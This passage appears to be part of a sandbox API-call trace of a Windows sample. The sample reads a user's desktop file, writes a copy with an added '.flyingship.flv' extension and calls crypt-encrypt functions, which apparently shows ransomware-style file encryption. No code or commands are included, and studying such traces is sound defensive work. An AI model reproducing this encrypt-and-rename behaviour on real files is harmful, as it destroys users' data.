hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.049] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e00 [0075.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0e00 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.049] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.050] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.050] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0075.050] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.050] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a38 [0075.050] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bhg xz5nypyf_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.051] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.051] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.051] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e00 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0e00 | out: hHeap=0x650000) returned 1 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.051] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.051] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.052] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0075.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb0) returned 0x69bce0 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d730 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x69d7a8 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69bce0 | out: hHeap=0x650000) returned 1 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d730 | out: hHeap=0x650000) returned 1 [0075.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bhg xz5nypyf_.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0075.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.065] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 1 [0075.065] TranslateMessage (lpMsg=0x61ee24) returned 0 [0075.065] DispatchMessageW (lpMsg=0x61ee24) returned 0x0 [0075.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e00 [0075.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.066] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61e4c0) returned 1 [0075.066] KillTimer (hWnd=0x4011e, uIDEvent=0x1) returned 1 [0075.066] SetTimer (hWnd=0x4011e, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0075.066] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e00 [0075.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.067] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.067] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.067] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.067] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.067] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x329b, lpOverlapped=0x0) returned 1 [0075.069] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.069] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x329b) returned 0x6a14d0 [0075.069] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.070] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.070] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.070] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.070] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.070] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.070] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0075.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb548 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.071] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.071] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.071] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.072] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0075.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 